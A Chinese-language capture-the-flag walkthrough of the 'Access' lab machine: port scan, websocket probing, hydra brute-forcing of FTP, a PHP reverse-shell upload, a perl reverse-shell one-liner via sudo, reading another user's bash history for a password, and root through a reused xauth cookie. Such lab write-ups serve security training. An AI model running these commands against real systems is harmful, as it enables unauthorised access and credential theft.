# 靶场搭建
下载:Access
Nat,IP: 192.168.1.155
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http nginx 1.18.0 | |
|_http-title: Welcome to nginx! | |
|_http-server-header: nginx/1.18.0 | |
5555/tcp open ftp pyftpdlib 1.5.8 | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to: 192.168.1.155:5555 | |
| Waiting for username. | |
| TYPE: ASCII; STRUcture: File; MODE: Stream | |
| Data connection closed. | |
|_End of status. | |
6666/tcp open irc? | |
| fingerprint-strings: | |
| GenericLines, GetRequest, HTTPOptions, RTSPRequest: | |
| HTTP/1.1 400 Bad Request | |
| Date: Mon, 27 May 2024 12:13:19 GMT | |
| Server: Python/3.9 websockets/11.0.3 | |
| Content-Length: 77 | |
| Content-Type: text/plain | |
| Connection: close | |
| Failed to open a WebSocket connection: did not receive a valid HTTP request. | |
| Help, Socks5: | |
| HTTP/1.1 400 Bad Request | |
| Date: Mon, 27 May 2024 12:13:04 GMT | |
| Server: Python/3.9 websockets/11.0.3 | |
| Content-Length: 77 | |
| Content-Type: text/plain | |
| Connection: close | |
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request. |
ftp 的匿名连接连不上去
6666 是 websocket,下载连接程序连一下:websocat
┌──(root㉿kali)-[~/websocat] | |
└─# ./websocat_max.x86_64-unknown-linux-musl ws://192.168.1.155:6666 | |
Hello noname, | |
Change your FTP password as soon as possible your server is at risk. | |
Regards! |
得到了名字: noname
破解一下 ftp 的密码
┌──(root㉿kali)-[~/websocat] | |
└─# hydra -l noname -P /usr/share/wordlists/rockyou.txt -I -t 64 ftp://192.168.1.155:5555 | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 09:01:55 | |
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task | |
[DATA] attacking ftp://192.168.1.155:5555/ | |
[5555][ftp] host: 192.168.1.155 login: noname password: phoenix |
连上 FTP 后直接 PUT 上反弹 shell。后缀需要是 php5,其他的都不能解析。
访问拿到反弹 shell
# 提权
sudo -l 发现有 perl
直接弹 shell: sudo -u noname perl -e 'use Socket;$i="192.168.1.155";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
再次提权
noname@access:/$ sudo -l | |
Matching Defaults entries for noname on access: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | |
User noname may run the following commands on access: | |
(powerful) NOPASSWD: /usr/bin/rev | |
noname@access:/$ LFILE=/home/powerful/.bash_history | |
noname@access:/$ sudo -u powerful rev $LFILE | rev | |
passwd powerful | |
Th3_p0w3R_of_H4ck1nG | |
Th3_p0w3R_of_H4ck1nG | |
exit |
再次提权拿到 root
┌──(root㉿kali)-[~] | |
└─# ssh -X [email protected] | |
[email protected]'s password: | |
/usr/bin/xauth: file /home/powerful/.Xauthority does not exist | |
powerful@access:~$ xauth list | |
access/unix:10 MIT-MAGIC-COOKIE-1 2995418f2d2bb4c5ad4e3f070f697e28 | |
powerful@access:~$ sudo xauth add access/unix:10 MIT-MAGIC-COOKIE-1 2995418f2d2bb4c5ad4e3f070f697e28 | |
xauth: file /root/.Xauthority does not exist | |
powerful@access:~$ sudo terminator |
在弹出来的 terminator 就是 root 的 shell 了
